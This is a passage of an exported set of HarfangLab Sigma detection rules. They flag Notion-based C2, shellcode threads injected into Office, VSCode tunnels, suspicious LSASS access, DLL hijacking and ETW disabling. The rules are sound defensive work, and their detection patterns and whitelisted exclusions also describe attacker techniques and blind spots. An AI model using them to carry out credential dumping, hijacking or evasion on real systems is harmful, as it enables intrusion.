"content": "title: Suspicious URL request to api.notion.com\nid: 80c7b1a3-29b3-4c45-8609-82e0738fb42c\ndescription: |\n Detects suspicious URL requests to api.notion.com.\n Notion is a legitimate online workspace that can be used by attackers to use as command and control (C2).\n The Nobelium GraphicalNeutrino malware is known to exploit this service for C2 communications.\n It is recommended to analyze the process responsible for the URL request to determine if the communication is legitimate.\nreferences:\n - https://go.recordedfuture.com/hubfs/reports/cta-2023-0127.pdf\n - https://www.notion.so\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/03/08\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.001\n - attack.t1102.002\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n RequestUrlHost: 'api.notion.com'\n\n filter_notion:\n ProcessSigned: 'true'\n ProcessSignature: 'Notion Labs, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "80c7b1a3-29b3-4c45-8609-82e0738fb42c",
"rule_name": "Suspicious URL request to api.notion.com",
"rule_description": "Detects suspicious URL requests to api.notion.com.\nNotion is a legitimate online workspace that can be used by attackers to use as command and control (C2).\nThe Nobelium GraphicalNeutrino malware is known to exploit this service for C2 communications.\nIt is recommended to analyze the process responsible for the URL request to determine if the communication is legitimate.\n",
"rule_creation_date": "2023-03-08",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1102.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "80fbb6bd-afa2-4e53-952b-a18d5cf2772b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084774Z",
"creation_date": "2026-03-23T11:45:34.084776Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084780Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/",
"https://attack.mitre.org/techniques/T1106/",
"https://attack.mitre.org/techniques/T1620/"
],
"name": "t1204_002_msoffice_injected_thread.yml",
"content": "title: Suspicious Thread Created in Office\nid: 80fbb6bd-afa2-4e53-952b-a18d5cf2772b\ndescription: |\n Detects the suspicious creation of an executable thread in a Microsoft Office application.\n A malicious VBA macro using the CALL function could directly leverage Microsoft OS API to create an executable thread and inject a shellcode into it.\n It is recommended to investigate the document opened by Office when this detection happened to look for malicious VBA macros or the exploitation of vulnerabilities.\n Is is also recommended to analyze the subsequent behavior of the Office application, mainly look for suspicious child processes.\nreferences:\n - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\n - https://attack.mitre.org/techniques/T1106/\n - https://attack.mitre.org/techniques/T1620/\ndate: 2023/12/14\nmodified: 2025/09/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1106\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1620\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: injected_thread\ndetection:\n selection:\n ProcessImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\OUTLOOK.EXE'\n - '\\MSPUB.EXE'\n - '\\POWERPNT.EXE'\n RegionSize|gte: 4096\n RegionSize|lte: 65536\n RegionState: 'MEM_COMMIT'\n RegionType: 'MEM_PRIVATE'\n RegionProtection: 'PAGE_EXECUTE_READWRITE'\n RegionAllocationProtection: 'PAGE_EXECUTE_READWRITE'\n\n filter_region_start_bytes:\n RegionDump|startswith:\n - '0x000000000000000000000000000000'\n - '0x4D5A'\n\n exclusion_mactray: # Injecter: MacType\\MacTray.exe, mt64agnt.exe, https://github.com/snowie2000/mactype\n ThreadDump|startswith: '0x40534883EC2033D2488BD9488B4910448D42'\n\n exclusion_gamemon: # Injecter: GameGuard\\GameMon64.des, https://gameguard.nprotect.com\n ThreadDump|startswith: '0xE831010000454C4908000005000A00000000'\n\n # Netskop EPDLP\n exclusion_netskop:\n ThreadDump|startswith: '0x4883EC284831C94831D249B8'\n RegionSize: 4096\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "80fbb6bd-afa2-4e53-952b-a18d5cf2772b",
"rule_name": "Suspicious Thread Created in Office",
"rule_description": "Detects the suspicious creation of an executable thread in a Microsoft Office application.\nA malicious VBA macro using the CALL function could directly leverage Microsoft OS API to create an executable thread and inject a shellcode into it.\nIt is recommended to investigate the document opened by Office when this detection happened to look for malicious VBA macros or the exploitation of vulnerabilities.\nIs is also recommended to analyze the subsequent behavior of the Office application, mainly look for suspicious child processes.\n",
"rule_creation_date": "2023-12-14",
"rule_modified_date": "2025-09-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1106",
"attack.t1204.002",
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "811137eb-c074-4346-95a0-c3b719d52436",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088075Z",
"creation_date": "2026-03-23T11:45:34.088077Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088081Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/",
"https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/",
"https://ipfyx.fr/post/visual-studio-code-tunnel/",
"https://code.visualstudio.com/docs/remote/tunnels",
"https://attack.mitre.org/techniques/T1572/",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/techniques/T1567/"
],
"name": "t1090_linux_vs_code_tunnel_commandline.yml",
"content": "title: VSCode Proxy Tunnel Started via Command-line (Linux)\nid: 811137eb-c074-4346-95a0-c3b719d52436\ndescription: |\n Detects when the VSCode editor is launched with a command-line argument used to connect to a network tunnel.\n Since July 2023, Microsoft added a feature that allows users to share their Visual Studio Desktop on the web through its own tunnel.\n This tunnel allows attackers to connect to a remote machine and potentially bypass any network counter-measures.\n It is recommended to investigate the actions following the creation of this tunnel to determine if they are legitimate.\nreferences:\n - https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/\n - https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/\n - https://ipfyx.fr/post/visual-studio-code-tunnel/\n - https://code.visualstudio.com/docs/remote/tunnels\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2023/09/25\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.Exfiltration\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/code'\n - '/codium'\n CommandLine|contains: ' tunnel'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "811137eb-c074-4346-95a0-c3b719d52436",
"rule_name": "VSCode Proxy Tunnel Started via Command-line (Linux)",
"rule_description": "Detects when the VSCode editor is launched with a command-line argument used to connect to a network tunnel.\nSince July 2023, Microsoft added a feature that allows users to share their Visual Studio Desktop on the web through its own tunnel.\nThis tunnel allows attackers to connect to a remote machine and potentially bypass any network counter-measures.\nIt is recommended to investigate the actions following the creation of this tunnel to determine if they are legitimate.\n",
"rule_creation_date": "2023-09-25",
"rule_modified_date": "2025-01-30",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8120633c-3a12-4a4a-ba28-aca664ee60b2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627478Z",
"creation_date": "2026-03-23T11:45:34.627480Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627485Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_access_suspicious_calltrace_start.yml",
"content": "title: LSASS Accessed with Suspicious CallTrace Starting with Uncommon DLL\nid: 8120633c-3a12-4a4a-ba28-aca664ee60b2\ndescription: |\n Detects an access to LSASS whose call trace starts with an uncommon pattern.\n Adversaries may try to obfuscate their accesses to the LSASS process by using direct syscalls or custom DLLs.\n It is recommended to investigate the process accessing LSASS and the content of the call trace.\nreferences:\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2024/04/02\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n CallTrace|contains: 'dll' # filter out empty calltrace\n\n filter_start_ntdll:\n CallTrace|startswith: '?:\\Windows\\System32\\ntdll.dll'\n\n # This is handled by the rule 4c2e7819-9e13-4d0f-8926-6bab029881d7\n filter_unknown:\n CallTrace:\n - 'UNKNOWN(????????????????)'\n - 'UNKNOWN(????????????????)?UNKNOWN(????????????????)'\n - 'UNKNOWN(????????????????)?UNKNOWN(????????????????)?UNKNOWN(????????????????)'\n\n filter_error:\n CallTrace|startswith: 'ACCESS_FAILED'\n\n filter_winsxs:\n CallTrace|startswith:\n - '?:\\Windows\\WinSxS\\amd64_microsoft-windows-ntdll_'\n - '?:\\Windows\\WinSxS\\Temp\\PendingDeletes\\$$DeleteMe.ntdll.dll'\n - '?:\\Windows\\WinSxS\\Temp\\PendingDeletes\\$$DeleteMentdll.dll'\n\n exclusion_start_symantec:\n CallTrace|startswith:\n - '?:\\Windows\\System32\\sysfer.dll'\n - '?:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\\\*\\Data\\Sysfer\\x64\\sysfer.dll'\n\n exclusion_start_wowcpu:\n CallTrace|startswith: '?:\\Windows\\System32\\wow64cpu.dll'\n\n exclusion_bmc:\n ProcessImage: '*\\BMC Software\\Client Management\\\\*\\bin\\mtxagent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'BMC Software France SAS'\n\n exclusion_trendmicro:\n ProcessProcessName:\n - 'TmCCSF.exe'\n # C:\\Program Files (x86)\\Trend Micro\\Security Agent\\Ntrtscan.exe\n - 'Ntrtscan.exe'\n - 'coreServiceShell.exe' # C:\\Program Files\\Trend Micro\\AMSP\\coreServiceShell.exe\n - 'TMBMSRV.exe' # C:\\Program Files (x86)\\Trend Micro\\BM\\TMBMSRV.exe\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n exclusion_eset:\n ProcessImage: '*\\ekrn.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ESET, spol. s r.o.'\n\n exclusion_mcafee:\n ProcessProcessName:\n - 'mfetp.exe'\n - 'mcshield.exe'\n - 'mfefw.exe' # C:\\Program Files\\McAfee\\Endpoint Security\\Firewall\\mfefw.exe\n ProcessSigned: 'true'\n ProcessSignature:\n - 'McAfee, Inc.'\n - 'McAfee, LLC'\n - 'MUSARUBRA US LLC' # new signer name for mcafee/trellix it seems\n\n exclusion_sentinelone:\n ProcessImage: '?:\\Program Files\\SentinelOne\\Sentinel Agent *\\SentinelAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Sentinel Labs, Inc.'\n\n exclusion_afkjourney:\n ProcessImage|endswith: '\\AFKJourney Game\\game\\AFK Journey.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Shanghai Lilith Network Technology Co., Ltd.'\n\n exclusion_kaspersky:\n SourceImage:\n - '?:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Endpoint Security for Windows\\avp.exe'\n - '?:\\Program Files (x86)\\Kaspersky Lab\\KES.*\\avp.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Kaspersky Lab JSC'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_anticheat:\n SourceImage: '?:\\Program Files\\EA\\AC\\eaanticheat.gameservice.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Electronic Arts, Inc.'\n\n exclusion_defender:\n SourceImage: '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_hp:\n SourceImage:\n - '?:\\WINDOWS\\System32\\DriverStore\\FileRepository\\\\*\\x64\\AppHelperCap.exe'\n - '?:\\Program Files\\HP\\HP Enabling Services\\AppHelperCap.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'HP Inc.'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8120633c-3a12-4a4a-ba28-aca664ee60b2",
"rule_name": "LSASS Accessed with Suspicious CallTrace Starting with Uncommon DLL",
"rule_description": "Detects an access to LSASS whose call trace starts with an uncommon pattern.\nAdversaries may try to obfuscate their accesses to the LSASS process by using direct syscalls or custom DLLs.\nIt is recommended to investigate the process accessing LSASS and the content of the call trace.\n",
"rule_creation_date": "2024-04-02",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "81219c6e-886d-4b50-b40f-41239e06d340",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073948Z",
"creation_date": "2026-03-23T11:45:34.073950Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073960Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
"https://attack.mitre.org/techniques/T1574/001/",
"https://attack.mitre.org/techniques/T1574/002/"
],
"name": "t1574_001_prepare_persistence_dll_hijack_sessionenv_tsmsisrv_tsvipsrv.yml",
"content": "title: SessionEnv Service DLL Hijack Prepared\nid: 81219c6e-886d-4b50-b40f-41239e06d340\ndescription: |\n Detects the preparation of a DLL hijacking of the SessionEnv service, which tries to load the non-existant TSMSISrv.dll or TSVIPSrv.dll DLLs in the System32 directory.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL in paths where the application is lured into loading the malicious DLL.\n Attackers can use this technique to execute malicious code within a legitimate process and try to bypass security restrictions.\n It is recommended to analyze the process responsible for the creation of the DLL file as well as to analyze the DLL itself to look for malicious content or actions.\nreferences:\n - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992\n - https://attack.mitre.org/techniques/T1574/001/\n - https://attack.mitre.org/techniques/T1574/002/\ndate: 2020/10/02\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.defense_evasion\n - attack.t1574.001\n - attack.t1574.002\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path:\n - '?:\\Windows\\System32\\TSMSISrv.dll'\n - '?:\\Windows\\System32\\TSVIPSrv.dll'\n\n exclusion_tiworker:\n # C:\\Windows\\WinSxS\\Temp\\InFlight\\8e744265c6e9d6012163000028443044\\x86_microsoft-windows-t..-tsappsrv-component_31bf3856ad364e35_10.0.18362.1_none_e51344e8b75a8450\\TSVIPSrv.dll\n # C:\\Windows\\SoftwareDistribution\\Download\\5e1bc13863a9edce2a85b3decedd49f5\\wow64 Microsoft-...\\TSVIPSrv.dll\n Path|startswith:\n - '?:\\Windows\\WinSxS\\Temp\\'\n - '?:\\Windows\\SoftwareDistribution\\'\n\n exclusion_setuphost:\n #\"C:\\$WINDOWS.~BT\\Sources\\SetupHost.Exe\" /Install /Package /Quiet /ReportId 392BCADE-AA59-480A-BCB8-2531CF4C7BB7.1 /FlightData \"RS:91AA\" \"/CancelId\" \"C-550fea5d-7c6c-4f82-aafd-2ff0174557d1\" \"/PauseId\" \"P-550fea5d-7c6c-4f82-aafd-2ff0174557d1\" \"/CorrelationVector\" \"GSAhuSONx02Lv7o+.10.0.0.3.147\" \"/EnterpriseAttribution\" \"/ActionListFile\" \"C:\\Windows\\SoftwareDistribution\\Download\\1e1311ab437e7a164204683b9686c982\\ActionList.xml\"\n Path|startswith:\n # C:\\$WINDOWS.~BT\\NewOS\\Windows\\WinSxS\\x86 microsoft-windows-t..-tsappsrv-component 31bf3856ad364e35 10.0.19041.1 none c8a6e270d97f9beb\\TSVIPSrv.dll\n - '?:\\Windows\\WinSxS\\'\n # c:\\windows\\servicing\\LCU\\*\\tsmisrv.dll\n - '?:\\Windows\\servicing\\LCU\\'\n\n exclusion_mui:\n # some alerts are raised on *.mui files?\n Path|endswith:\n - '\\TSMSISrv.dll.mui'\n - '\\TSVIPSrv.dll.mui'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "81219c6e-886d-4b50-b40f-41239e06d340",
"rule_name": "SessionEnv Service DLL Hijack Prepared",
"rule_description": "Detects the preparation of a DLL hijacking of the SessionEnv service, which tries to load the non-existant TSMSISrv.dll or TSVIPSrv.dll DLLs in the System32 directory.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL in paths where the application is lured into loading the malicious DLL.\nAttackers can use this technique to execute malicious code within a legitimate process and try to bypass security restrictions.\nIt is recommended to analyze the process responsible for the creation of the DLL file as well as to analyze the DLL itself to look for malicious content or actions.\n",
"rule_creation_date": "2020-10-02",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1574.001",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "814f4f55-9d99-469a-bbd5-80b622a72327",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087839Z",
"creation_date": "2026-03-23T11:45:34.087841Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087846Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.splunk.com/endpoint/8ed523ac-276b-11ec-ac39-acde48001122/",
"https://gist.github.com/Cyb3rWard0g/a4a115fd3ab518a0e593525a379adee3",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_windows_etw_disabled_env.yml",
"content": "title: ETWEnabled User Environment Variable Modified via Registry\nid: 814f4f55-9d99-469a-bbd5-80b622a72327\ndescription: |\n Detects a modification of the environment variable in registry \"COMPlus_ETWEnabled\" to an empty value, effectively disabling ETW for the current user.\n Event Tracing for Windows (ETW) provides a mechanism to trace and log events that are raised by user-mode applications and kernel-mode drivers.\n Attackers may attempt to disable it to reduce detection from EDRs and other defensive tools.\n It is recommended to ensure that this action is legitimate and performed by an authorized administrator.\nreferences:\n - https://research.splunk.com/endpoint/8ed523ac-276b-11ec-ac39-acde48001122/\n - https://gist.github.com/Cyb3rWard0g/a4a115fd3ab518a0e593525a379adee3\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/03/20\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1562.006\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set:\n EventType: SetValue\n TargetObject|endswith: '\\Environment\\COMPlus_ETWEnabled'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n selection_rename:\n EventType: RenameValue\n TargetObject|endswith: '\\Environment\\COMPlus_ETWEnabled'\n\n condition: (selection_set and not filter_empty) or selection_rename\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "814f4f55-9d99-469a-bbd5-80b622a72327",
"rule_name": "ETWEnabled User Environment Variable Modified via Registry",
"rule_description": "Detects a modification of the environment variable in registry \"COMPlus_ETWEnabled\" to an empty value, effectively disabling ETW for the current user.\nEvent Tracing for Windows (ETW) provides a mechanism to trace and log events that are raised by user-mode applications and kernel-mode drivers.\nAttackers may attempt to disable it to reduce detection from EDRs and other defensive tools.\nIt is recommended to ensure that this action is legitimate and performed by an authorized administrator.\n",
"rule_creation_date": "2023-03-20",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001",
"attack.t1562.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "81652c3b-9fe2-4574-8a7c-b934c200d75f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602648Z",
"creation_date": "2026-03-23T11:45:34.602652Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602660Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_datausagelivetiletask.yml",
"content": "title: DLL Hijacking via datausagelivetiletask.exe\nid: 81652c3b-9fe2-4574-8a7c-b934c200d75f\ndescription: |\n Detects potential Windows DLL Hijacking via datausagelivetiletask.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'datausagelivetiletask.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dusmapi.dll'\n - '\\IPHLPAPI.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "81652c3b-9fe2-4574-8a7c-b934c200d75f",
"rule_name": "DLL Hijacking via datausagelivetiletask.exe",
"rule_description": "Detects potential Windows DLL Hijacking via datausagelivetiletask.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
